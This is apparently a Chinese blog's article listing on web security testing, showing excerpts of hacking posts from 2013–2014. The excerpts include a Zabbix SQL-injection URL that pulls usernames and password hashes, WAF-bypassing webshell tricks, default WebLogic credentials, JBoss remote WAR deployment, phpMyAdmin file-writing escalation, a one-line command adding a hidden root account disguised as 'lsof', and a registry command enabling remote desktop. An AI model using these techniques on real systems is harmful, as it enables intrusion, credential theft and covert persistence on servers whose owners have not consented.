WEB安全测试
C宝_
这个作者很懒,什么都没留下…
展开
-
【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。湛蓝天空声明:本方法具有很强针对攻击性,目的是让大家了解黑客利用开源系统PHPCMS V9漏洞入侵网站,取得webshell权限并添加持久锚链接的一般流程。请勿对任何漏洞站点进行测试转载 2013-10-12 10:23:37 · 7169 阅读 · 0 评论 -
zabbix破解用户,密码
http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20c原创 2013-10-18 16:22:35 · 1933 阅读 · 0 评论 -
UCenter表字段
1:uc_membersuid,username,password,email,myid,myidkey,regip,regdate,lastloginip,lastlogintime,salt2:uc_admins uid,username,allowadminsetting,allowadminapp,allowadminuser,allowadminbadword,all原创 2013-10-16 14:45:46 · 653 阅读 · 0 评论 -
sqlmap---post----注入
sqlmap---post----注入先抓包http://zzzzz.com/xx/xx_list.asp?action=listbm=%C6%BD%C3%E6%B2=sss&xx=sss------------------------------------------------------------------------------------------原创 2013-10-14 13:39:25 · 1318 阅读 · 0 评论 -
突破安全狗的一些记录
1、绕过IIS安全狗的一句话。前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。连接端用cncert的aspx一句话客户端。2、IIS6.0解析漏洞遇到安全狗。文件名为http://www.2cto.com /1.asp;1.jpg。这样的会被IIS安全狗转载 2013-10-15 00:45:38 · 953 阅读 · 0 评论 -
Tomcat漏洞利用
Tomcat是Apache软件基金会的一个免费的、开放源码的WEB应用服务器,可以运行在Linux和Windows等多个平台上,由于其性能稳定、扩展性好、免费等特点深受广大用户的喜爱。目前,互联网上绝大多数JAVA WEB应用都运行在Tomcat服务器上。Tomcat作为Web应用的载体,一旦出现安全问题,那么运行在其上的Web应用的安全也无法得到保障,所以研究Tomcat的漏洞与安全性就转载 2013-10-13 15:50:29 · 3664 阅读 · 1 评论 -
常见web中间件拿shell
作者:Pax.Mac Team核心成员1.weblogic后台页面:http://127.0.0.1:7001/console(http为7001,https为7002)Google关键字:WebLogic Server Administration Console inurl:console默认的用户名密码1、用户名密码均为:weblogic2、用转载 2013-10-13 15:40:38 · 1103 阅读 · 0 评论 -
文件上传攻防解析
文件上传是WEB应用很常见的一种功能,本身是一项正常的业务需求,不存在什么问题。但如果在上传时没有对文件进行正确处理,则很可能会发生安全问题。本文将对文件上传的检测方式以及如何绕过相应检测方式进行详细的分析,并提供针了对文件上传攻击的安全防护方法。文件上传攻击是指攻击者利用WEB应用对上传文件过滤不严,导致可以上传应用程序定义类型范围之外的文件到Web服务器。比如可以上传一个网页木马,如果转载 2013-10-13 11:20:29 · 1439 阅读 · 0 评论 -
phpmyadmin的提权
一:暴路径:libraries/lect_lang.lib.phpthemes/darkblue_orange/layout.inc.php二:提权选择一个Database.运行以下语句.----start code---Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES('''');sel转载 2013-10-13 10:51:20 · 864 阅读 · 0 评论 -
JBOSS远程代码执行漏洞
JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图下拉找到如下图所示点击flavor=URL,type=DeploymentScanner进入转载 2013-10-12 13:56:41 · 1083 阅读 · 0 评论 -
linux一条命令添加一个root级别账户并设置密码
内网机器提权添加账户,无回显,设置密码就不好弄,下面就是添加一个root级别的账户并设置密码的命令 useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof命令解释useradd 添加用户-p `open转载 2013-10-12 13:35:21 · 1061 阅读 · 0 评论 -
intitle,inurl,filetype,site的作用以及在google中的用法
说起Google,可谓无人不知无人不晓。作为世界第一的搜索引擎,其强大的搜索功能,可以让你在瞬间找到你想要的一切。不过对于普通的计算机用户而言,Google是一个强大的搜索引擎;而对于黑客而言,则可能是一款绝佳的黑客工具。正因为google的检索能力强大,黑客可以构造特殊的关键字,使用Google搜索互联网上的相关隐私信息。通过Google,黑客甚至可以在几秒种内黑掉一个网站。这种利用Google转载 2013-10-12 11:00:26 · 2906 阅读 · 0 评论 -
dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理 员帐号,新版本的就直接转向了后台.2.include/dialog/config.php会爆出后台管理路径3.include/dialog/select_soft.php?activepath=/include/FCKeditor转载 2013-10-12 14:30:27 · 1760 阅读 · 0 评论 -
dos下一句话开启3389
dos下一句话开启3389,不用重启,测试过XP和2003.....dos下一句话开启3389,不用重启,测试过XP和2003.....开启3389REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f查看远程终端REG转载 2014-04-17 15:47:15 · 1237 阅读 · 0 评论